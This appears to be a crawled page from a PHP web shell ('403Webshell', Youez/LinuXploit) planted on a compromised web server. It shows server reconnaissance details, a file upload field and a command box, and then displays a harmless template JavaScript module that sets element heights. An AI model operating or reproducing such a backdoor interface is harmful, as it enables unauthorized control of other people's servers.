403Webshell
Server IP : 104.21.21.239  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/domains/nycyouth/js/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/domains/nycyouth/js/modules/dataheights.js
CNVS.DataHeights = function() {
	var __core = SEMICOLON.Core;
	var __modules = SEMICOLON.Modules;

	return {
		init: function(selector) {
			if( __core.getSelector(selector, false, false).length < 1 ){
				return true;
			}

			__core.initFunction({ class: 'has-plugin-dataheights', event: 'pluginDataHeightsReady' });

			selector = __core.getSelector( selector, false, false );
			if( selector.length < 1 ){
				return true;
			}

			selector.forEach( function(el) {
				var heightXs = el.getAttribute('data-height-xs') || 'auto',
					heightSm = el.getAttribute('data-height-sm') || heightXs,
					heightMd = el.getAttribute('data-height-md') || heightSm,
					heightLg = el.getAttribute('data-height-lg') || heightMd,
					heightXl = el.getAttribute('data-height-xl') || heightLg,
					heightXxl = el.getAttribute('data-height-xxl') || heightXl,
					body = __core.getVars.elBody.classList,
					elHeight;

				if( body.contains('device-xs') ) {
					elHeight = heightXs;
				} else if( body.contains('device-sm') ) {
					elHeight = heightSm;
				} else if( body.contains('device-md') ) {
					elHeight = heightMd;
				} else if( body.contains('device-lg') ) {
					elHeight = heightLg;
				} else if( body.contains('device-xl') ) {
					elHeight = heightXl;
				} else if( body.contains('device-xxl') ) {
					elHeight = heightXxl;
				}

				if( elHeight ) {
					el.style.height = !isNaN( elHeight ) ? elHeight + 'px' : elHeight;
				}
			});

			__core.getVars.resizers.dataHeights = function() {
				__modules.dataHeights();
			};
		}
	};
}();

Youez - 2016 - github.com/yon3zu
LinuXploit